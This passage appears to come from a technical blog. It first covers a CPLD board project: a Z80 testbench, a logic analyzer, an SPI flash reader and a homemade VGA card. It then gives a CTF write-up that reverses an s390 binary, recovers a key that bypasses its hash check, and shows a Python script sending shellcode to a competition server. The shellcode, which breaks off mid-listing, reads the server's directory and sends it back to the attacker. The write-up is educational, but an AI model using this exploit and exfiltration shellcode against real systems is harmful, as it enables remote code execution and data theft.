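    if not mreq_n and rfsh_n:
        # Memory request that is not a DRAM refresh cycle
        if not rd_n:
            # An opcode fetch is a memory read with _M1 asserted
            return "FETCH" if not m1_n else "MEMRD"
        if not wr_n:
            return "MEMWR"
    elif not iorq_n:
        if not wr_n:
            return "IOWR"
        if not rd_n:
            return "IORD"
    return "IDLE"


print(classify(mreq_n=0, iorq_n=1, rd_n=0, wr_n=1, m1_n=0, rfsh_n=1, halt_n=1))  # FETCH
print(classify(mreq_n=1, iorq_n=0, rd_n=1, wr_n=0, m1_n=1, rfsh_n=1, halt_n=1))  # IOWR
print(classify(mreq_n=0, iorq_n=1, rd_n=1, wr_n=1, m1_n=1, rfsh_n=0, halt_n=1))  # IDLE
```

The last call shows why _RFSH is part of the condition: refresh cycles also assert _MREQ, but they must not be reported to the host as memory accesses.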

While waiting for an answer from the host, the trick here was to assert the _WAIT input of the CPU in order to notify it that the bus cycle could not be completed at that moment. This left enough time for the host to communicate its desired operation. To finalize a write operation, the host just had to read from the DIN control register, which moved the testbench to the WRITE state. A read operation was completed by writing to the DOUT control register, which moved it to the READ state.

```python
bus_access = Signal()
iom.comb += iom.iosignals._WAIT.eq(~bus_access)

def goto_rd():
    return If(iom.cregs.DOUT.wr_pulse, NextState("READ"))

def goto_wr():
    return If(iom.cregs.DIN.rd_pulse, NextState("WRITE"))

fsm.act("FETCH",
        iom.cregs.STATE.eq(Z80State.FETCH),
        bus_access.eq(1),
        goto_rd())

fsm.act("MEMRD",
        iom.cregs.STATE.eq(Z80State.MEMRD),
        bus_access.eq(1),
        goto_rd())

fsm.act("MEMWR",
        iom.cregs.STATE.eq(Z80State.MEMWR),
        bus_access.eq(1),
        goto_wr())

fsm.act("IORD",
        iom.cregs.STATE.eq(Z80State.IORD),
        bus_access.eq(1),
        goto_rd())

fsm.act("IOWR",
        iom.cregs.STATE.eq(Z80State.IOWR),
        bus_access.eq(1),
        goto_wr())
```

To finally complete the bus cycle after intervention from the host, the data bus just had to be driven in the corresponding direction:

```python
def goto_idle():
    return If(iom.iosignals._MREQ & iom.iosignals._IOREQ, NextState("IDLE"))

fsm.act("READ",
        iom.cregs.STATE.eq(Z80State.IDLE),
        oe.eq(1),
        goto_idle())

fsm.act("WRITE",
        iom.cregs.STATE.eq(Z80State.IDLE),
        goto_idle())
```

### Section II: The Gates Open

Once the testbench logic was defined, the BMIIModule could then be integrated into a final BMII design:

```python
z80tb = BMIIModule(iom)

b = BMII()
b.add_module(z80tb)
```

The actual wiring to the tested Z80 looked as follows. Due to the lack of physical IO pins on the main board, the last two pins of the address bus had been ignored.

The southbridge had to be informed of this configuration. Any change to the physical circuit only implied rerouting the testbench's IOModule on the southbridge unit:

```python
b.ioctl.sb.pins.IO28 += iom.iosignals._RESET
b.ioctl.sb.pins.IO29 += iom.iosignals._WAIT
b.ioctl.sb.pins.IO2A += iom.iosignals.CLK
b.ioctl.sb.pins.IO2B += iom.iosignals._M1
b.ioctl.sb.pins.IO2C += iom.iosignals._MREQ
b.ioctl.sb.pins.IO2D += iom.iosignals._IOREQ
b.ioctl.sb.pins.IO2E += iom.iosignals._RD
b.ioctl.sb.pins.IO2F += iom.iosignals._WR
b.ioctl.sb.pins.IO1F += iom.iosignals._HALT
b.ioctl.sb.pins.IO1E += iom.iosignals._RFSH

# Address lines A0..A13 go to pins IO10..IO1D
for i in range(ADDRESS_WIDTH):
    pin = getattr(b.ioctl.sb.pins, "IO1{}".format(hex(i)[2:].upper()))
    pin += getattr(iom.iosignals, "A{}".format(i))

# Each data pin is shared by an input, an output and a direction control
for i in range(DATA_WIDTH):
    pin = getattr(b.ioctl.sb.pins, "IO2{}".format(i))
    pin += getattr(iom.iosignals, "DIN{}".format(i))
    pin += getattr(iom.iosignals, "DOUT{}".format(i))
    pin += getattr(iom.iosignals, "DDIR{}".format(i))
```

### Section III: La Grande Illusion

As the IO controller design was completed, the host driver had to be completed in order to define the exact behaviour of the testbench.

For this example, the goal was to be able to execute a very short piece of code on the connected Z80. The content of the main memory had been defined as:

```python
def ld_hl_nn(nn):
    return [0x2A, nn & 0xFF, (nn >> 8) & 0xFF]

def ld_b_n(n):
    return [0x06, n]

def ld_c_n(n):
    return [0x0E, n]

def otir():
    return [0xED, 0xB3]

def halt():
    return [0x76]

from itertools import chain, islice, repeat

s = "LSE"

instrs = chain(
    # Instructions
    ld_hl_nn(0x000A),       # 0000 - Load string address
    ld_b_n(len(s)),         # 0003 - Load string length
    ld_c_n(0),              # 0005 - Set IO port address
    otir(),                 # 0007 - Output the string
    halt(),                 # 0009 - Halt the CPU

    # Data
    [0x0C, 0x00],           # 000A - String address
    [ord(c) for c in s],    # 000C - String content

    # Padding (flattened so that the memory only contains integers)
    chain.from_iterable(repeat(halt()))  # Fill the rest of the memory
                                         # with HALT instruction
)

mem = list(islice(instrs, 256))
```

The only job of the host was to poll the STATE register and to reply by reading from the DIN control register or by writing to DOUT according to the CPU's request.

```python
recvbuff = ""

# Reset the CPU by pulsing the _RESET signal
z80tb.drv.CTL.RESET = 1
z80tb.drv.CTL.RESET = 0

while True:
    state = int(z80tb.drv.STATE)

    print("{} \t-- Addr: {:04x}".format(str(Z80State(state)),
        (int(z80tb.drv.ADDRH) << 8) | int(z80tb.drv.ADDRL)), end='')

    # Emulate main memory reading
    if (state in [Z80State.FETCH, Z80State.MEMRD]):
        z80tb.drv.DOUT = mem[int(z80tb.drv.ADDRL)]

    # Emulate main memory writing
    elif (state == Z80State.MEMWR):
        mem[int(z80tb.drv.ADDRL)] = int(z80tb.drv.DIN)

    # Emulate reading from device
    elif (state == Z80State.IORD):
        z80tb.drv.DOUT = 0xFF

    # Emulate writing to device
    elif (state == Z80State.IOWR):
        data = int(z80tb.drv.DIN)
        recvbuff += chr(data)
        print(" | Data: {:02x} ({})".format(data, chr(data)), end='')

    # Stop main loop when CPU reaches the halt state
    elif (state == Z80State.HALTED):
        break

    print()

print("Received string: [{}]".format(recvbuff))
```

```
Z80State.FETCH  -- Addr: 0000
Z80State.MEMRD  -- Addr: 0001
Z80State.MEMRD  -- Addr: 0002
Z80State.MEMRD  -- Addr: 000a
Z80State.MEMRD  -- Addr: 000b
Z80State.FETCH  -- Addr: 0003
Z80State.MEMRD  -- Addr: 0004
Z80State.FETCH  -- Addr: 0005
Z80State.MEMRD  -- Addr: 0006
Z80State.FETCH  -- Addr: 0007
Z80State.FETCH  -- Addr: 0008
Z80State.MEMRD  -- Addr: 000c
Z80State.IOWR   -- Addr: 0200 | Data: 4c (L)
Z80State.FETCH  -- Addr: 0007
Z80State.FETCH  -- Addr: 0008
Z80State.MEMRD  -- Addr: 000d
Z80State.IOWR   -- Addr: 0100 | Data: 53 (S)
Z80State.FETCH  -- Addr: 0007
Z80State.FETCH  -- Addr: 0008
Z80State.MEMRD  -- Addr: 000e
Z80State.IOWR   -- Addr: 0000 | Data: 45 (E)
Z80State.FETCH  -- Addr: 0009
Z80State.HALTED -- Addr: 001f
Received string: [LSE]
```
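The port addresses seen in the trace (0200, 0100, 0000) may look surprising since C was loaded with 0. They follow from the way the Z80 executes OTIR: B is decremented before the I/O write and the whole BC pair is placed on the address bus. The model below reproduces only this bus activity; it is a sketch with a hypothetical function name, not an emulator.

```python
def otir_bus_writes(mem, hl, b, c):
    """Return the (port address, byte) pairs produced by one OTIR execution."""
    writes = []
    while True:
        data = mem[hl]
        b = (b - 1) & 0xFF                 # B is decremented first...
        writes.append(((b << 8) | c, data))  # ...then BC drives the address bus
        hl = (hl + 1) & 0xFFFF
        if b == 0:                         # the instruction repeats until B is zero
            break
    return writes


memory = [0x00] * 0x0C + [ord(ch) for ch in "LSE"]
writes = otir_bus_writes(memory, hl=0x000C, b=3, c=0)
for port, byte in writes:
    print("{:04x} {:02x} ({})".format(port, byte, chr(byte)))
# 0200 4c (L)
# 0100 53 (S)
# 0000 45 (E)
```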

## Chapter V: The Feebleness Appears

In the meantime, the two other tinkerers were focused on testing the main board in some more pragmatic scenarios in order to find its limitations, with the hope that it would serve a real purpose.

### Section I: The Relativity of Space...

Their experience with the implementation of a JTAG module had been marked by the difficulty of debugging and tracing the state of the digital design. As the northbridge and the internal bus logic were considered reliable enough, they decided to implement an IOModule exclusively designed to probe any other signal of the IO controller design.

Acting as an internal logic analyser, a probing circuit composed of one control register fed by a FIFO was generated for each probed signal.

The capture was triggered by a special configurable signal and could be reset by the host at any moment.

As an example, the following design made the main board act as a very cheap logic analyzer where all IO signals were simultaneously probed. The trigger was wired to the physical switch input:

```python
b = BMII()

la = LogicAnalyzer(4) # Probing FIFO of 4 elements
b.add_module(la)

sb = b.modules.southbridge.iomodule

#        Probe name  Width  Signal
la.probe("IO1L",     8,     sb.cregs.PINSCAN1L)
la.probe("IO1H",     8,     sb.cregs.PINSCAN1H)
la.probe("IO2L",     8,     sb.cregs.PINSCAN2L)
la.probe("IO2H",     8,     sb.cregs.PINSCAN2H)
la.probe("IOMISC",   8,     sb.cregs.PINSCANMISC)
la.set_trigger(~sb.cregs.PINSCANMISC.SW)
```

In parallel, an implementation of an SPI master module was in development. It was a perfect test case for the logic analyzer as it had not yet been tested on a real SPI slave.

```python
from bmii.modules.spi import SPIMaster
from bmii.modules.spidev import SerialFlash

b = BMII.default()

spi = SPIMaster.default(b)

la.probe("SCLK", 1, spi.iomodule.iosignals.SCLK)
la.probe("SS0", 1, spi.iomodule.iosignals.SS0)
la.probe("MOSI", 1, spi.iomodule.iosignals.MOSI)
la.set_trigger(spi.iomodule.cregs.TX.wr_pulse)
```

The SPI module initiated a transaction when its TX register was written. Its wr_pulse was then used to define the trigger of the logic analyzer as the goal was to analyse the output signal during an SPI activity.

The capture method of a logic analyzer object waited for a capture to be completed and then dequeued the samples by reading the control register of each probe.

```python
la.reset()
spi.select_slave(0)
spi.tranceive(42)

la.capture()
la.show()
```

Finally, the show method could be used to dump the captured waveforms to a VCD file and to display it using gtkwave.
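For readers unfamiliar with the format, a VCD file is a plain-text list of signal declarations followed by timestamped value changes. The function below is a minimal sketch of how 1-bit samples could be serialized; it is not the code behind the show method, and the function name, scope name and timescale are assumptions.

```python
def to_vcd(signals, timescale="1 ns"):
    """signals: dict name -> list of 0/1 samples, all of the same length."""
    names = list(signals)
    # Short identifier codes, as used by VCD: '!', '"', '#', ...
    ids = {name: chr(33 + i) for i, name in enumerate(names)}
    lines = ["$timescale {} $end".format(timescale),
             "$scope module capture $end"]
    for name in names:
        lines.append("$var wire 1 {} {} $end".format(ids[name], name))
    lines += ["$upscope $end", "$enddefinitions $end"]

    previous = {}
    length = len(next(iter(signals.values())))
    for t in range(length):
        # Only value changes are written, which keeps the file small
        changes = ["{}{}".format(signals[n][t], ids[n])
                   for n in names if previous.get(n) != signals[n][t]]
        if changes:
            lines.append("#{}".format(t))
            lines.extend(changes)
        for n in names:
            previous[n] = signals[n][t]
    return "\n".join(lines) + "\n"


vcd = to_vcd({"SCLK": [0, 1, 0, 1], "MOSI": [0, 0, 1, 1]})
print(vcd)
```

The resulting text can be written to a file and opened with gtkwave.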

However, each probe circuit consumed a significant number of logic blocks, which limited the design to tiny FIFOs and made the logic analyser useless on complex circuits.

### Section II: ...And Time

After this first disappointment related to the quite limited space provided by the CPLD, they pursued their work on the SPI module by implementing the operations required to drive a JEDEC-compliant serial flash memory.

```python
sf = SerialFlash.default(b, spi, slave_id=0)
sf.read_id()
```

```
Manufacturer ID: 0xC2 (Macronix)
Memory Type: 0x20
Memory Capacity: 0x15 (16Mb)
```
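The three bytes returned by the identification command can be decoded by hand. On this family of chips the capacity byte is commonly the base-2 logarithm of the size in bytes, which is consistent with the 16Mb reported above; this convention is an assumption that does not hold for every vendor. The helper below is hypothetical and not part of bmii.

```python
MANUFACTURERS = {0xC2: "Macronix"}   # only the entry seen in the output above


def decode_jedec_id(raw):
    """raw: the 3 bytes (manufacturer, memory type, capacity) of the JEDEC ID."""
    manufacturer, mem_type, capacity = raw
    size_bytes = 1 << capacity       # assumed encoding: log2 of the size in bytes
    return {
        "manufacturer": MANUFACTURERS.get(manufacturer, "unknown"),
        "memory_type": mem_type,
        "size_bytes": size_bytes,
        "size_mbit": size_bytes * 8 // (1 << 20),
    }


info = decode_jedec_id(bytes([0xC2, 0x20, 0x15]))
print(info["manufacturer"], info["size_bytes"], info["size_mbit"])
# Macronix 2097152 16
```

A capacity of 2 MiB means the last valid address is 0x1FFFFF.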

Driving the SPI flash was actually quite easy once it had been extracted from its original circuit. This one was desoldered from a PC motherboard:

```python
sf.dump(0x1FE000, size=25)
```

```
b'Award BootBlock BIOS v1.0'
```

The real challenge was to probe the SPI packets passively. This implied basing the IOModule logic on the SPI clock imposed by an external device instead of the regular system clock. Even though all this logic had been implemented and tested on simple devices, it was still returning malformed data when used on a PC motherboard since the BIOS flash was clocked at a frequency higher than 40MHz.

Their guess about the cause of this issue was that no IO pin was connected to a clock input of the CPLD. This meant that the SPI clock came in through a regular IO input not designed to support such a high frequency.

## Chapter VI: Displayed As Of Yore

Affected by these failures, the first two tinkerers doubted the real efficiency of the current hardware design of their board. Out of curiosity and driven by their discouragement, they looked for the third one, probably lost in his solo projects.

They found him in his basement, soldering wires and axial resistors to a VGA connector. He explained that he was, oddly, trying to make the main board act as a video card. It was a plainly useless job but he was glad to do it. Bored, the two others tried to help him finish and agreed that it would be their last experiment with their board.

### Section I: The Dilemma Of Etching Copper

Although driving VGA signals was quite simple, they estimated that creating a dedicated expansion board would make their job easier. Firstly, it would allow the mechanical integration of a decent VGA connector. Secondly, it was a good opportunity to add some extra memory to the board, as the CPLD would not be able to store enough data to implement a video card. A standard 128KB static RAM in an SSOP package was chosen for its simple interface and its fast response time.

The VGA's RGB pins must be driven by analog signals, which implied the use of Digital to Analog Converters controlled from the CPLD. As these signals are defined to be terminated to ground by a 75 Ohm resistor on the monitor side, a cheap equivalent of a DAC could be obtained by connecting different resistors to several CPLD outputs, wired in parallel and acting as a voltage divider with the monitor's termination resistor (see R1 to R6).
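The behaviour of such a resistor DAC can be estimated with Millman's theorem. The sketch below models one color channel driven by two outputs. The resistor values (470 and 1000 Ohm), the 3.3V output level and the assumption that a low output is actively driven to ground are illustrative guesses, not the values of R1 to R6 on the real board.

```python
def dac_voltage(bits, resistors, v_high=3.3, r_term=75.0):
    """Voltage on a VGA color pin driven through a resistor network.

    `bits` are the logic levels of the outputs (0 or 1) and `resistors`
    the series resistor attached to each of them. Outputs at 0 are
    assumed to be driven to ground, so their resistor ends up in
    parallel with the monitor's termination resistor.
    """
    conductance = 1.0 / r_term + sum(1.0 / r for r in resistors)
    current = sum(v_high * bit / r for bit, r in zip(bits, resistors))
    return current / conductance


if __name__ == "__main__":
    resistors = (470.0, 1000.0)  # hypothetical MSB and LSB resistors
    for code in range(4):
        bits = ((code >> 1) & 1, code & 1)
        print("code %d -> %.3f V" % (code, dac_voltage(bits, resistors)))
```

With two bits per channel, each channel gets four levels that should ideally spread between 0V and the 0.7V full-scale level expected on a VGA color line.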

By allocating 6 outputs to the RGB signals (2 bits per channel), 64 colors could be generated. However, the limited number of IO pins prevented using all 17 address lines of the SRAM at the same time as the 6 RGB pins.

In order to postpone this design decision, jumpers were added to the extension PCB so that the configuration could be chosen at soldering time. The first setting allowed 8 colors with a 128KB video RAM (all 17 address lines), while the second one restricted the video RAM to 16KB but could drive 64 colors (see the table on the bottom layer of the PCB).

### Section II: A Proselytized Static Memory

On a regular video card, the framebuffer is supposed to be stored in a dual-port RAM so that the controller can write the displayed frame at the same time as the signal generator reads it. As this kind of device requires a large number of pins, a regular SRAM was used as a substitute for a real VRAM.

Of course, this tweak forced a tighter management of the VRAM, as two independent actors were using it at the same time through a single interface.

From a high-level point of view the simple video card could be represented as an IOModule by following this architecture:

To manage the VRAM, the trick was to exploit the fact that the pixel clock required for a 640x480 display at 60Hz is fixed at 25.175MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read from the VRAM and to drive the pixel clock at 24MHz, about 4.7% below the nominal rate, which was acceptable for most recent VGA monitors. Meanwhile, even ticks were used to perform the write operations on the VRAM. To ensure that write operations were successful, the read operation that followed a write was cancelled, which was not critical most of the time but could lead to small display glitches.

The VRAM management unit could be described with the following state-machine:

• 1: If a write operation has to be performed, then, drive the data and the address bus. Else, drive the address bus for the next reading.
• 2: Reading state: Capture the output of the VRAM
• 3: Writing state: Indicate to the VRAM that the data bus is ready to be read for a memory writing.
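The three states listed above can be simulated in software to see how a pending write steals a read slot. This is only one interpretation of the description: the class name `VramArbiter`, the write queue and the `skipped_reads` counter are assumptions made for the sketch and do not come from the original design.

```python
from collections import deque

SETUP, READ, WRITE = 1, 2, 3  # state numbers used in the list above


class VramArbiter:
    """Software model of a single-port SRAM shared by display and writer."""

    def __init__(self, size):
        self.mem = bytearray(size)
        self.state = SETUP
        self.pending = deque()   # queued (address, value) write requests
        self.addr = 0
        self.data = 0
        self.pixel = 0           # last byte captured for the display logic
        self.skipped_reads = 0   # reads cancelled because of a write

    def request_write(self, addr, value):
        self.pending.append((addr, value))

    def tick(self, read_addr):
        """Advance by one IO clock tick and return the displayed byte."""
        if self.state == SETUP:
            if self.pending:
                # State 1, write branch: drive address and data buses.
                self.addr, self.data = self.pending.popleft()
                self.state = WRITE
                self.skipped_reads += 1
            else:
                # State 1, read branch: drive the address of the next read.
                self.addr = read_addr
                self.state = READ
        elif self.state == READ:
            # State 2: capture the output of the memory.
            self.pixel = self.mem[self.addr]
            self.state = SETUP
        else:
            # State 3: strobe the write; the display keeps its old value.
            self.mem[self.addr] = self.data
            self.state = SETUP
        return self.pixel


if __name__ == "__main__":
    vram = VramArbiter(16)
    vram.request_write(5, 9)
    for _ in range(4):
        print(vram.tick(read_addr=5))
```

In this model every access takes two ticks, so a write delays the display by one pixel slot, which corresponds to the small glitches mentioned earlier.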

### Section III: Words Engraved In A Black Screen

As the VRAM management core logic and the VGA signal generation were working correctly, changing what was displayed only required adapting the logic that drove the reads from the VRAM and the RGB signals according to the VRAM's data.

To demonstrate how the VRAM could be managed, a simple text mode had been implemented.

VRAM was organized as follows:

• 0x0000 - Text framebuffer: as in the VGA-compatible text mode implemented on PC platforms, each character consisted of two bytes, the first holding the ASCII code and the second the color.
• 0x0700 - Character set (3KB): sprites representing each character. A font similar to IBM's code page 437 was used.

As only one read from the VRAM was possible per pixel clock tick, the reading sequence had to be aligned with the character display. During the last three pixels of a character, the VRAM reading logic fetched the ASCII code and the color of the next character from the framebuffer and provided the display logic with the corresponding sprite row from the character set.
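The three reads performed for each character can be sketched as address computations. The two base addresses come from the layout above; the number of columns and the glyph height are not given in the text, so they are left as parameters, and the values used in the example (40 columns, 12 rows per glyph with one byte per row) are purely hypothetical.

```python
TEXT_BASE = 0x0000  # text framebuffer (from the layout above)
FONT_BASE = 0x0700  # character set (from the layout above)


def cell_address(col, row, cols):
    """Address of the ASCII byte of a text cell; the color byte follows it."""
    return TEXT_BASE + 2 * (row * cols + col)


def fetch_glyph_row(vram, col, row, line, cols, glyph_height):
    """Perform the three reads needed before a character is displayed.

    `cols` and `glyph_height` are assumptions about the text mode geometry;
    each glyph row is assumed to be stored as a single byte.
    """
    base = cell_address(col, row, cols)
    code = vram[base]                                    # read 1: ASCII code
    color = vram[base + 1]                               # read 2: color
    bits = vram[FONT_BASE + code * glyph_height + line]  # read 3: sprite row
    return code, color, bits


if __name__ == "__main__":
    vram = bytearray(FONT_BASE + 256 * 12)
    vram[cell_address(1, 0, cols=40)] = ord("A")
    vram[cell_address(1, 0, cols=40) + 1] = 0x07
    vram[FONT_BASE + ord("A") * 12 + 5] = 0x7E
    print(fetch_glyph_row(vram, col=1, row=0, line=5, cols=40, glyph_height=12))
```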

## Epilogue

Surprisingly, the first two tinkerers found unexpected satisfaction in completing this dumb video card. The result of this last experiment reflected the childish feelings that had pushed them to start their first board: a satisfying design serving a useless objective.

This forced step back helped them to highlight the items that could improve the next version of the board, if someone were brave enough to follow in their footsteps. The lack of logic blocks could easily be solved by switching to an FPGA. A lot of decent ones were still available in 144-pin EQFP packages. Allocating pins to an external RAM would not be a waste either. Many other applications were blocked by the lack of an embedded and easy-to-use memory.

Concerning the timing issues encountered while probing the SPI flash, simply mapping some clock inputs to physical headers would be enough to unscramble most of them.

After that, the tinkerers team split up. Each of them had been aligned to the 'state-of-art'-ish folk and they finally scattered, where engineers dwell...

• # Olympic-CTF 2014: zpwn (200 points)

Written by Remi Audebert and Pierre Surply
2014-02-10 22:26:13

This exercise was based on an IBM s/390 ELF running on a remote server which listens on UDP port 31337.

The first thing we did was to set up Hercules, an open source software implementation of the mainframe System/370 and ESA/390 architectures, to run a Linux distribution. After some tries with Debian and openSUSE, we finally succeeded in setting up Fedora 20 on this emulator.

## Reversing ELF

At first sight, the binary simply seems to echo back via UDP the entire buffer sent by the client.

After disassembling it, we saw that the buffer is hashed and compared to a constant value: if the hash is equal to 0xfffcecc8 then the process jumps into the received buffer instead of sending it back.

```
/* Receive buffer via UDP */
80000b26:  a7 49 20 00        lghi   %r4,8192           ; len
80000b2a:  b9 04 00 2a        lgr    %r2,%r10           ; sockfd
80000b2e:  b9 04 00 3b        lgr    %r3,%r11           ; buff
80000b32:  a7 59 00 00        lghi   %r5,0              ; flags
80000b36:  b9 04 00 69        lgr    %r6,%r9            ; src_addr
80000b3a:  a7 18 00 10        lhi    %r1,16
80000b3e:  50 10 f0 cc        st     %r1,204(%r15)
80000b42:  c0 e5 ff ff fe 51  brasl  %r14,800007e4
80000b48:  b9 14 00 42        lgfr   %r4,%r2
80000b4c:  b9 02 00 44        ltgr   %r4,%r4
80000b50:  a7 84 00 1d        je     80000b8a
80000b54:  b9 04 00 5b        lgr    %r5,%r11
80000b58:  a7 28 ff ff        lhi    %r2,-1
80000b5c:  b9 04 00 34        lgr    %r3,%r4

/* Hash buffer */
80000b60:  43 10 50 00        ic     %r1,0(%r5)
80000b64:  41 50 50 01        la     %r5,1(%r5)
80000b68:  17 12              xr     %r1,%r2
80000b6a:  88 20 00 08        srl    %r2,8
80000b6e:  b9 84 00 11        llgcr  %r1,%r1
80000b72:  eb 11 00 02 00 0d  sllg   %r1,%r1,2
80000b78:  57 21 c0 00        x      %r2,0(%r1,%r12)
80000b7c:  a7 37 ff f2        brctg  %r3,80000b60
80000b80:  c2 2d ff fc ec c8  cfi    %r2,-201528        ; Compare hash to 0xfffcecc8
80000b86:  a7 84 00 14        je     80000bae

/* Send buffer via UDP if hash(buffer) != 0xfffcecc8 */
80000b8a:  b9 04 00 2a        lgr    %r2,%r10           ; sockfd
80000b8e:  b9 04 00 3b        lgr    %r3,%r11           ; buff
80000b92:  a7 59 00 00        lghi   %r5,0              ; flags
80000b96:  b9 04 00 69        lgr    %r6,%r9            ; dest_addr
80000b9a:  a7 19 00 10        lghi   %r1,16
80000b9e:  e3 10 f0 a0 00 24  stg    %r1,160(%r15)
80000ba4:  c0 e5 ff ff fe 70  brasl  %r14,80000884
80000baa:  a7 f4 ff bb        j      80000b20

/* Jump into buffer if hash(buffer) == 0xfffcecc8 */
80000bae:  0d eb              basr   %r14,%r11
80000bb0:  a7 f4 ff b8        j      80000b20
```
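The hash loop of this listing can be transliterated into a few lines of Python. The lookup table pointed to by %r12 is not shown in the disassembly. The sketch assumes it is the standard CRC-32 table (reflected polynomial 0xEDB88320), which is consistent with the four table words recovered in the next section, but this remains an assumption for the rest of the table. The names `make_table` and `zpwn_hash` are ours.

```python
def make_table(poly=0xEDB88320):
    """Build the standard reflected CRC-32 lookup table (assumed table)."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = make_table()


def zpwn_hash(data):
    """Transliteration of the loop at 80000b60..80000b7c."""
    r2 = 0xFFFFFFFF                      # lhi %r2,-1
    for byte in bytearray(data):         # ic %r1,0(%r5) ; la %r5,1(%r5)
        index = (byte ^ r2) & 0xFF       # xr %r1,%r2 ; llgcr %r1,%r1
        r2 = (r2 >> 8) ^ TABLE[index]    # srl %r2,8 ; x %r2,0(%r1,%r12)
    return r2


if __name__ == "__main__":
    print(hex(zpwn_hash(b"Hi !")))
```

Under this assumption the function is a CRC-32 without the final bit inversion, so `zpwn_hash(data)` equals `zlib.crc32(data) ^ 0xffffffff`.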

## Breaking the hash

When we look closer at the hash function, we can see that the %r2 register is initialized to 0xffffffff and then XORed with values located in .rodata. Because %r2 is shifted right by 8 bits before each XOR operation, the most significant byte of each %r2 value is exactly the most significant byte of the table word that was just XORed in. It is therefore easy to find the location of this data by applying a reversed version of the algorithm and analysing the most significant byte of each %r2 value.

```
800010e0:   ff 0f 6a 70
          ^ ff fc ec c8
          --------------
            00 f3 86 b8 ----\
                            |
                            | srl 8
80000dc4:   f3 b9 71 48     |
          ^ f3 86 b8 xx  <-/
          --------------
            00 3f c9 xx ----\
                            |
                            | srl 8
80001014:   3f b5 06 dd     |
          ^ 3f c9 xx xx  <-/
          --------------
            00 7c xx xx

800010b4:   7c dc ef b7
```

From this, we deduced that the values used are located, in order of use, at 800010b4, 80001014, 80000dc4 and 800010e0. We could now apply the algorithm in the forward direction to get the real values of %r2.

```
(0xffffffff >> 8) ^ 0x7cdcefb7 = 0x7c231048
(0x7c231048 >> 8) ^ 0x3fb506dd = 0x3fc925cd
(0x3fc925cd >> 8) ^ 0xf3b97148 = 0xf386b86d
(0xf386b86d >> 8) ^ 0xff0f6a70 = 0xfffcecc8
```

The least significant byte of each previous %r2 value (starting with the initial 0xffffffff) must now be XORed with the corresponding table offset to obtain the key.

```
Offsets:
(0x800010e0 - 0x80000d7c) >> 2 = 0xd9
(0x80000dc4 - 0x80000d7c) >> 2 = 0x12
(0x80001014 - 0x80000d7c) >> 2 = 0xa6
(0x800010b4 - 0x80000d7c) >> 2 = 0xce

Key: 0xcea612d9 ^ 0xff48cd6d = 0x31eedfb4
```

So, when this process receives 0x31eedfb4 via UDP, it jumps to the buffer address.
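The manual steps above can be automated. The sketch below walks the hash backwards by matching most significant bytes against the table, then replays it forwards to recover the four key bytes. As before, it assumes that the table in .rodata is the standard CRC-32 table, of which only four words were actually observed; `find_key` is a name chosen for this example.

```python
def make_table(poly=0xEDB88320):
    """Standard reflected CRC-32 lookup table (assumed to match .rodata)."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = make_table()
# The top byte of each entry is unique, so it identifies the entry.
MSB_TO_INDEX = {entry >> 24: index for index, entry in enumerate(TABLE)}
assert len(MSB_TO_INDEX) == 256


def find_key(target, init=0xFFFFFFFF):
    """Return the 4-byte input whose hash equals `target`."""
    # Backward pass: after 'srl 8' the top byte of %r2 is zero, so the top
    # byte of the result is the top byte of the table word that was XORed in.
    indices = []
    value = target
    for _ in range(4):
        index = MSB_TO_INDEX[value >> 24]
        indices.append(index)
        # Undo the XOR and the shift; the low byte stays unknown (zero here).
        value = ((value ^ TABLE[index]) << 8) & 0xFFFFFFFF
    indices.reverse()

    # Forward pass: index = byte ^ (low byte of %r2), so byte = index ^ low.
    key = bytearray()
    r2 = init
    for index in indices:
        key.append(index ^ (r2 & 0xFF))
        r2 = (r2 >> 8) ^ TABLE[index]
    return bytes(key)


if __name__ == "__main__":
    print(" ".join("%02x" % b for b in bytearray(find_key(0xFFFCECC8))))
```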

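Since the process jumps to the start of the buffer, the four key bytes are themselves executed as code. To prevent a SIGSEGV or SIGILL when the process executes these first instructions, we need to complete the opcode 0xdfb4 to get a valid instruction. This is why each shellcode below starts with two padding words: the first one is overwritten by the key and the second one (0xf0000000) completes the edmk instruction.

```
31 ee              lner  %f14,%f14
df b4 f0 00 00 00  edmk  0(181,%r15),0
```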

## Exploit

Here is the Python script that we used to generate shellcodes using s390-linux-as and s390-linux-objcopy and send them to the remote machine:

```python
import socket
import subprocess

SERVER_IP = "109.233.61.11"
CLIENT_IP = # local ip
UDP_PORT = 31337

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

sock.sendto("Hi !", (SERVER_IP, UDP_PORT))
print sock.recvfrom(1024)[0]

port = sock.getsockname()[1]

asm = open("exploit200.s").read()
asm = asm.replace("____", hex(port)[2:])
asm = asm.replace("-------", CLIENT_IP)

p = subprocess.Popen("s390-linux-as -o exploit200",
                     stdin=subprocess.PIPE, shell=True)
p.communicate(asm)

p = subprocess.Popen("s390-linux-objcopy -O binary exploit200 /dev/stdout",
                     stdout=subprocess.PIPE, shell=True)
sock.sendto(p.communicate()[0], (SERVER_IP, UDP_PORT))
print sock.recvfrom(1024)[0]

sock.sendto("\x31\xee\xdf\xb4", (SERVER_IP, UDP_PORT))
print sock.recvfrom(1024)[0]
```
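The script fills the `____` and `-------` placeholders of the `.quad` directive with the port and the client address in hexadecimal. As an illustration of what the resulting value looks like, here is a small helper that builds it in one step, assuming the usual big-endian sockaddr_in layout (2 bytes of family, 2 bytes of port, 4 bytes of IPv4 address). The function name `sockaddr_quad` and the address used in the example are hypothetical.

```python
import socket
import struct


def sockaddr_quad(ip, port):
    """Return the 64-bit literal describing an AF_INET sockaddr_in.

    Layout assumed: family 0x0002, then the port, then the IPv4 address,
    all big-endian as on s390.
    """
    addr = struct.unpack(">I", socket.inet_aton(ip))[0]
    # Zero-pad the port to 4 hex digits and the address to 8.
    return "0x02%04x%08x" % (port, addr)


if __name__ == "__main__":
    # 192.0.2.1 is a documentation address used as a stand-in.
    print(sockaddr_quad("192.0.2.1", 31337))
```

Padding the port explicitly avoids a malformed literal when the local port is below 0x1000, a case where `hex(port)[2:]` yields fewer than four digits.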

### Listing the current directory

The first step of this exploit is to list the current directory to find the file which contains the flag. This can be done by filling a buffer with the getdents syscall and then sending it via UDP to the local machine.

```
    .long 0x00000000
    .long 0xf0000000
exploit:
    /* open */
    lhi     %r1, 5
    larl    %r2, dir
